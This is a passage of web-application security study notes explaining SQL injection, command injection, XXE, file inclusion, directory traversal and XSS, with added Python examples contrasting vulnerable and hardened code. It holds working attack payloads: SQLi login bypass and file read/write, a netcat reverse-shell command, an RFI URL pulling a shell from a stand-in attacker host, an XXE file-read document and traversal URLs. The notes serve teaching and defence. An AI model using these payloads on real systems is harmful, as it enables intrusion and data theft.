60 | ``UPDATE`` | updates data in a database
61 | ``DELETE`` | deletes data from a database
62 | ``INSERT INTO`` | inserts new data into a database
63 | ``ALTER TABLE`` | modifies a table
64 | ``DROP TABLE`` | deletes a table
65 | ``CREATE INDEX`` | creates an index (search key)
66 | ``DROP INDEX`` | deletes an index
67 | ``UNION`` | is used to combine the result-set of two or more SELECT statements.
68 |
69 | ---
70 |
71 | ### SQL Injection in action:
72 |
73 | - On the UserId input field, you can enter:
74 | - `105 OR 1=1`.
75 |
76 | - This is valid SQL, but instead of returning only UserId 105 the injection returns ALL rows from the "Users" table, **since OR 1=1 is always TRUE**. The SQL statement ends up looking like this:
77 | - `SELECT * FROM Users WHERE UserId = 105 OR 1=1;`
78 |
79 | - Double dash ( `--` ) tells the server to ignore the rest of the query (in this example, the password check)
80 |
81 | > ⚠️ **Basic test to see if SQL injection is possible is just inserting a single quote ( `'` )**
82 | > - Can be on input field or URL
83 | > - This will make the web app return a SQL syntax error meaning that you are able to inject SQL queries.
84 |
85 |
86 | **Bypassing authentication:**
87 | - `admin' or 1=1 -- `
88 | - Basically tells the server **if 1 = 1 (always true)** to allow the login, and the double dash `--` comments out the rest of the query, in this case the password check.
89 | - variations: `1' or 1=1 #`
90 |
91 | - Based on a `=` comparison that is always true (string context):
92 | - `" or ""="` --> entered as both username and password against a query built like ` SELECT * FROM Users WHERE Name ="John Doe" AND Pass ="myPass" `
93 | - The resulting statement is ` SELECT * FROM Users WHERE Name ="" or ""="" AND Pass ="" or ""="" `, which is valid and returns all rows from the "Users" table, **since OR ""="" is always TRUE**.
94 |
95 | **Enumerating:**
96 | - `1' union all select 1,user() #`
97 | - Returns the database account the service is running as (MySQL; `#` is the MySQL comment token)
98 |
99 | - `user' UNION ALL select 1,table_name,3,4,5 FROM information_schema.tables`
100 | - Lists the table names in the database (the 1,3,4,5 pad the column count to match the original SELECT)
101 |
102 | **Load/Reading a file:**
103 | - `bob' union all select 1,load_file("/etc/passwd"),3,4,5 --`
104 | - Reading the /etc/passwd file (MySQL `load_file()`; requires the FILE privilege and a path the server process can read)
105 |
106 | **Writing a file:**
107 | - `bob' union all select 1,"Test",3,4,5 into outfile '/tmp/test.txt'--`
108 | - Writes the selected rows to a file on the database server (MySQL; requires the FILE privilege and a path allowed by `secure_file_priv`). Column and line terminators can be specified to produce a specific output format, e.g. to drop a web shell into the document root.
109 |
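The payloads above, run for real. This is an added example, not code from the original notes: it builds an in-memory SQLite database with a constructed `Users` table and a string-concatenating login function (the bug), then shows the tautology, comment, numeric and UNION payloads against it and the same query with bound parameters. `--` is used as the comment token throughout because SQLite does not treat `#` as a comment (MySQL does), and `sqlite_master` plays the role MySQL's `information_schema.tables` plays above.

```python
"""String-built SQL vs. parameterised SQL against an in-memory SQLite DB.

Added example (not from the original notes). Table, rows and function
names are constructed for this demo; the payloads are the ones in the text.
"""
import sqlite3


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (UserId INTEGER, Name TEXT, Pass TEXT)")
    conn.executemany(
        "INSERT INTO Users VALUES (?, ?, ?)",
        [(1, "admin", "s3cret"), (105, "alice", "wonder"), (200, "bob", "builder")],
    )
    return conn


def login_vulnerable(conn, name: str, password: str) -> list:
    """Concatenates user input straight into the query (the bug)."""
    query = f"SELECT Name FROM Users WHERE Name = '{name}' AND Pass = '{password}'"
    return [row[0] for row in conn.execute(query)]


def login_safe(conn, name: str, password: str) -> list:
    """Same query with bound parameters: input is data, never SQL."""
    query = "SELECT Name FROM Users WHERE Name = ? AND Pass = ?"
    return [row[0] for row in conn.execute(query, (name, password))]


def lookup_vulnerable(conn, user_id: str) -> list:
    """Numeric context: no quote to break out of, '105 OR 1=1' is enough."""
    query = f"SELECT UserId FROM Users WHERE UserId = {user_id}"
    return [row[0] for row in conn.execute(query)]


def single_quote_probe(conn) -> bool:
    """The basic test from the notes: a lone quote breaks the syntax."""
    try:
        login_vulnerable(conn, "'", "x")
    except sqlite3.OperationalError:
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    print("probe errors out     :", single_quote_probe(db))
    print("tautology bypass     :", login_vulnerable(db, "admin' OR 1=1 --", "wrong"))
    print("comment out pw check :", login_vulnerable(db, "admin' --", "wrong"))
    print("numeric tautology    :", lookup_vulnerable(db, "105 OR 1=1"))
    print("union enumeration    :", login_vulnerable(
        db, "x' UNION SELECT name FROM sqlite_master WHERE type='table' --", "x"))
    print("parameterised        :", login_safe(db, "admin' OR 1=1 --", "wrong"))
```

Note that the UNION payload only works because the injected SELECT returns the same number of columns as the original one; with a wider original query you pad with literals (`1,table_name,3,4,5`) exactly as in the enumeration example above.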
110 | **Fuzzing** - inputting random data into a target to see what will happen
111 |
112 | **Tautology** - using always true statements to test SQL (e.g. `1=1`)
113 |
114 | **In-band SQL injection** - uses same communication channel to perform attack
115 |
116 | - Used when the data pulled back fits into what the application already returns (results rendered in a web table or page)
117 |
118 | - Best for using `UNION` queries
119 |
120 | **Out-of-band SQL injection** - results leave via a different channel (e.g. DNS or HTTP requests made by the database server to the attacker, or writing results to a file on the web server that is then fetched)
121 |
122 | **Blind/inferential** - error messages and screen returns don't occur; usually have to guess whether command work or use timing to know
123 |
124 | - **SQLi Tools:**
125 | - Sqlmap
126 | - sqlninja
127 | - Havij
128 | - SQLBrute
129 | - Pangolin
130 | - SQLExec
131 | - Absinthe
132 | - BobCat
133 |
134 | ---
135 |
136 | ### **Broken Authentication**
137 | Broken Authentication usually occurs due to the issues with the application’s authentication mechanism;
138 |
139 | - **Credential Stuffing and Brute Force Attacks**
140 | - **Weak Passwords & Recovery Process**
141 | - **Mismanagement of Session ID**
142 |
143 | *An attacker can gain control over user accounts in a system. In the worst case, it could help them gain complete control over the system.*
144 |
145 | ---
146 |
147 | ### **Command Injection**
148 | Execution of arbitrary commands on the host operating system via a vulnerable application.
149 | - Injection is possible when an application passes unsafe user-supplied data (forms, cookies, HTTP headers etc.) to a system shell.
150 | - Web apps sometimes need to execute OS commands to communicate with the underlying host OS and the file system. This can be done to run system commands, launch applications written in another programming language, or run shell, python, perl, or PHP scripts.
151 |
152 | **Example**:
153 | - Imagine a vulnerable application that has a common function that passes an **IP address from a user input** to the system's **ping command**.
154 | - User input: `127.0.0.1`
155 | - The following command is executed on the host OS:
156 | - `ping -c 5 127.0.0.1`
157 | - It is possible to break out of the ping command and execute the attacker's arbitrary commands:
158 | - `ping -c 5 127.0.0.1; id`
159 | - If the system is vulnerable the output will look like this (showing two OS commands, `ping` and `id`):
160 |
161 | ```console
162 | --- 127.0.0.1 ping statistics ---
163 | 5 packets transmitted, 5 received, 0% packet loss, time 3999ms
164 | rtt min/avg/max/mdev = 0.023/0.056/0.074/0.021 ms
165 |
166 | uid=0(root) gid=0(root) groups=0(root)
167 | ```
168 |
169 | - Without input sanitising the attacker can spawn a reverse shell back to their own host:
170 | - `127.0.0.1; nc -nv 4444 -e /bin/bash`
171 |
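The ping wrapper described above, as an added example that is not part of the original notes, in both its vulnerable and hardened form. The wrapper and function names are constructed for this demo; to stay runnable offline the demo functions run `echo` through the shell instead of `ping`, but the injection mechanics (a `;` ending the intended command) are identical, and `build_ping_argv` shows what the hardened wrapper would actually execute.

```python
"""Shell-built command vs. argv list with validated input.

Added example (not from the original notes). 'echo' stands in for 'ping'
so the demo runs offline; everything else is what a real wrapper does.
"""
import ipaddress
import shlex
import subprocess


def run_vulnerable(target: str) -> str:
    """shell=True plus string interpolation: ';', '|', '&&', '$()' and
    backticks inside 'target' are interpreted by /bin/sh."""
    command = f"echo PING {target}"          # real code: f"ping -c 5 {target}"
    completed = subprocess.run(command, shell=True, capture_output=True, text=True)
    return completed.stdout


def validate_target(target: str) -> str:
    """Allow-list validation: accept only a syntactically valid IP literal."""
    try:
        return str(ipaddress.ip_address(target.strip()))
    except ValueError:
        raise ValueError(f"not an IP address: {target!r}") from None


def build_ping_argv(target: str) -> list:
    """What the hardened wrapper would exec: an argv list, no shell at all."""
    return ["ping", "-c", "5", validate_target(target)]


def run_safe(target: str) -> str:
    """argv list, shell=False: the whole string is one argument to echo,
    and validation has already rejected anything that is not an address."""
    argv = ["echo", "PING", validate_target(target)]
    completed = subprocess.run(argv, capture_output=True, text=True)
    return completed.stdout


if __name__ == "__main__":
    payload = "127.0.0.1; id"
    print("vulnerable:", run_vulnerable(payload))
    print("argv form :", shlex.join(build_ping_argv("127.0.0.1")))
    try:
        run_safe(payload)
    except ValueError as err:
        print("hardened  :", err)
```

Two controls are stacked here on purpose: the argv list removes the shell, so metacharacters lose their meaning, and the allow-list validation rejects hostnames and anything else that is not an address, which also blocks argument-injection tricks (a `target` beginning with `-`) that the argv form alone would not.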
172 | ---
173 |
174 | ### **Sensitive Data Exposure**
175 |
176 | When the web application doesn’t adequately protect sensitive information like **session tokens, passwords, banking information, location, health data**, or any other similar crucial data whose leak can be critical for the user.
177 |
178 | **Examples**:
179 | 1. *An application **stores credit card numbers in a database without encryption**. If an attacker gets access to the database through SQL injection, he could easily get the credit card numbers.*
180 |
181 | 2. **An application stores passwords in the database using unsalted or simple hashes**. An attacker can recover the passwords from unsalted hashes with Rainbow Table attacks.
182 |
183 | 3. **A website that doesn’t enforce TLS or uses weak encryption.** An attacker could monitor network traffic and downgrade the connections from HTTPS to HTTP. Then, they can intercept the requests and steal the user’s session cookie
184 |
185 | ---
186 |
187 | ### **XXE - XML External Entities**
188 | An attack against an application that parses XML input. It occurs when **XML input containing a reference to an external entity is processed by a weakly configured XML parser.**
189 |
190 | - Attackers can supply XML files with specially crafted DOCTYPE definitions to an XML parser with a weak security configuration to perform **path traversal, port scanning, and numerous attacks, including denial of service, server-side request forgery (SSRF), or even remote code execution.**
191 |
192 | **Example**:
193 |
194 | - External entities can reference URIs to retrieve content from local files or network resources.
195 | - This payload returns the content of the `/etc/passwd` file on the target's OS wherever the parser expands `&xxe;` (on Windows you could reference `file:///c:/boot.ini`). The root element name is arbitrary; the entity declaration and the reference are what matter.
196 |
197 | ```xml
198 | <?xml version="1.0"?>
199 | <!DOCTYPE foo [
200 |   <!ENTITY xxe SYSTEM "file:///etc/passwd">
201 | ]>
202 | <foo>&xxe;</foo>
203 | ```
204 |
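The defensive counterpart, as an added example (not code from the original notes): untrusted XML should never be allowed to carry a DTD at all, which is the approach the `defusedxml` project takes. Here Python's built-in expat parser is wired so that the DOCTYPE and entity-declaration callbacks raise, so the payload above is rejected before any entity could be expanded. The `ForbiddenXML` class, the `parse_untrusted_xml` helper and the two sample documents are constructed for this demo.

```python
"""Refusing DOCTYPE/ENTITY declarations before an XML parser can act on them.

Added example (not from the original notes). Python's own xml.etree does not
fetch external entities, but many parsers in other stacks do; the robust
control is to reject DTDs in untrusted input outright.
"""
import xml.parsers.expat


class ForbiddenXML(ValueError):
    """Raised when untrusted XML uses a DTD feature we do not allow."""


def parse_untrusted_xml(document: str) -> dict:
    """Parse XML into {element: text}, refusing any DOCTYPE or ENTITY."""
    parser = xml.parsers.expat.ParserCreate()
    result, stack = {}, []

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise ForbiddenXML(f"DOCTYPE '{name}' not allowed in untrusted input")

    def on_entity_decl(name, is_pe, value, base, sysid, pubid, notation):
        raise ForbiddenXML(f"entity declaration '{name}' (system id {sysid!r})")

    def on_start(name, attrs):
        stack.append(name)
        result.setdefault(name, "")

    def on_chars(data):                # may arrive in several chunks
        if stack:
            result[stack[-1]] += data

    def on_end(name):
        stack.pop()

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity_decl
    # Belt and braces: never follow external entity references either
    # (not reached once the DOCTYPE itself is refused).
    parser.ExternalEntityRefHandler = lambda context, base, sysid, pubid: 0
    parser.StartElementHandler = on_start
    parser.CharacterDataHandler = on_chars
    parser.EndElementHandler = on_end
    parser.Parse(document, True)
    return result


def is_xxe_attempt(document: str) -> bool:
    """True if the document tried to use a DTD feature we forbid."""
    try:
        parse_untrusted_xml(document)
    except ForbiddenXML:
        return True
    return False


# Constructed inputs: the classic file-read payload and a benign document.
XXE_PAYLOAD = (
    '<?xml version="1.0"?>\n'
    "<!DOCTYPE foo [\n"
    '  <!ENTITY xxe SYSTEM "file:///etc/passwd">\n'
    "]>\n"
    "<foo>&xxe;</foo>\n"
)
BENIGN = '<?xml version="1.0"?><user><name>alice</name></user>'

if __name__ == "__main__":
    print("payload rejected:", is_xxe_attempt(XXE_PAYLOAD))
    print("benign parsed   :", parse_untrusted_xml(BENIGN))
```

Rejecting the DOCTYPE (rather than only external entities) also shuts down the internal-entity variants such as the "billion laughs" expansion DoS mentioned above.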
205 | ___
206 |
207 | ### **RFI - Remote File Inclusion**
208 |
209 | Is a method that allows an attacker to employ a script to include a remotely hosted file on the webserver. The vulnerability promoting RFI is largely found on websites running on PHP. This is because PHP supports the ability to `‘include’` or `‘require’` additional files within a script;
210 |
211 | **Vulnerable PHP Example**:
212 |
213 | > **`$incfile = $_REQUEST["file"]; include($incfile.".php");`**
214 |
215 | - The first line takes the `file` parameter straight from the HTTP request, and the second uses it to build the path to include, without any sanitisation of the parameter value. Because PHP's `include` accepts URLs when `allow_url_include` is enabled, this code can be made to fetch and execute attacker-hosted code (unauthorised file inclusion).
216 |
217 | - For example the URL below makes the page include a PHP reverse shell stored on an attacker-controlled host (since the code appends `.php`, in practice the attacker ends the value with `?` so the suffix becomes a harmless query string):
218 | - `http://www.example.com/vuln_page.php?file=http://www.hacker.com/netcat.php`
219 |
220 | ---
221 |
222 |
223 | ### **LFI - Local File Inclusion**:
224 | is very similar to RFI. The only difference is that in LFI the attacker includes files already present on the server (e.g. a file they uploaded earlier, or a log file they could write to) instead of a remote file, and uses that to read sensitive files or execute a malicious script.
225 |
226 | **Examples**:
227 | - `http://example.com/?file=../../uploads/evil.php`
228 |
229 | ---
230 |
231 | ### **Directory Traversal**
232 | An attacker can get sensitive information like the contents of the /etc/passwd file that contains a list of users on the server; Log files, source code, access.log and so on
233 |
234 | **Examples:**
235 | - `http://example.com/events.php?file=../../../../etc/passwd`
236 | - An attacker can get the contents of the **/etc/passwd** (file that contains a list of users on the server).
237 |
238 | *Similarly, an attacker may leverage the Directory Traversal vulnerability to access **log files** (for example, **Apache access.log or error.log**), **source code**, and other sensitive information. This information may then be used to advance an attack.*
239 |
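The following Python is an added example (not code from the original notes) covering both the dot-dot-slash item in the web-server chapter and the LFI/Directory Traversal sections here. It contrasts the naive "strip `../`" filter, which the `....//` form walks straight through, with canonicalisation after full percent-decoding, which is the correct check. `WEBROOT` and the probe strings are constructed for the demo; `posixpath` is used instead of the real filesystem so the result is deterministic and runs offline.

```python
"""Resolving a user-supplied path safely under a web root.

Added example (not from the original notes). Shows why a blacklist filter
fails and how normalisation after decoding catches every variant above.
"""
import posixpath
from urllib.parse import unquote

WEBROOT = "/var/www/html"   # constructed for the demo


def naive_filter(requested: str) -> str:
    """Blacklist approach seen in the wild: delete '../' substrings once.
    '....//' survives as '../' after the deletion."""
    return requested.replace("../", "")


def decode_fully(value: str, max_rounds: int = 3) -> str:
    """Undo percent-encoding until stable, so %2e%2e%2f and the
    double-encoded %252e%252e%252f both become '../'."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def resolve_under_root(requested: str, webroot: str = WEBROOT) -> str:
    """Canonicalise the requested path and refuse anything leaving webroot."""
    decoded = decode_fully(requested).replace("\\", "/")   # IIS-style slashes
    if "\x00" in decoded:
        raise ValueError("NUL byte in path")
    candidate = posixpath.normpath(posixpath.join(webroot, decoded.lstrip("/")))
    if candidate != webroot and not candidate.startswith(webroot + "/"):
        raise ValueError(f"path escapes web root: {requested!r}")
    return candidate


if __name__ == "__main__":
    probes = [
        "events/2024.html",
        "../../../../etc/passwd",
        "%2e%2e%2f%2e%2e%2fetc/passwd",
        "%252e%252e%252fetc/passwd",
        "....//....//etc/passwd",
    ]
    for p in probes:
        print(f"{p!r:40} naive -> {naive_filter(p)!r}")
        try:
            print(f"{'':40} safe  -> {resolve_under_root(p)}")
        except ValueError as err:
            print(f"{'':40} safe  -> REJECTED ({err})")
```

On a live server the same check should be repeated on the real path (`os.path.realpath`) after opening, so that symlinks inside the document root cannot point back out of it.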
240 | ---
241 | ### **XSS (Cross-site scripting)**
242 | Injecting JavaScript (via a form field, URL parameter, etc.) into a page so that it executes in other users' browsers in the context of the vulnerable site.
243 | - Can also be passed via URL
244 | - Can be malicious by accessing cookies and sending them to a remote host
245 | - The **HttpOnly** cookie flag stops script from reading the session cookie, but it does not prevent the XSS itself; the payload still runs and can act through the victim's browser (e.g. issue requests with the cookie attached).
246 |
247 | ### Types of XSS:
248 |
249 | 1. **Stored XSS** (Persistent or Type-I) - the payload is stored server-side (forum post, comment, profile field) and served to everyone who views it.
250 |
251 | 2. **Reflected XSS** (or also called a non-persistent XSS); when an application receives data in an HTTP request and includes that data within the immediate response in an unsafe way.
252 |
253 | 3. **DOM Based XSS** (or as it is called in some texts, “type-0 XSS”) is an XSS attack wherein the attack payload is executed as a result of modifying the DOM “environment” in the victim's browser used by the original client side script, so that the client side code runs in an “unexpected” manner.
254 |
255 | Examples of XSS payloads:
256 | - `">`
257 | - `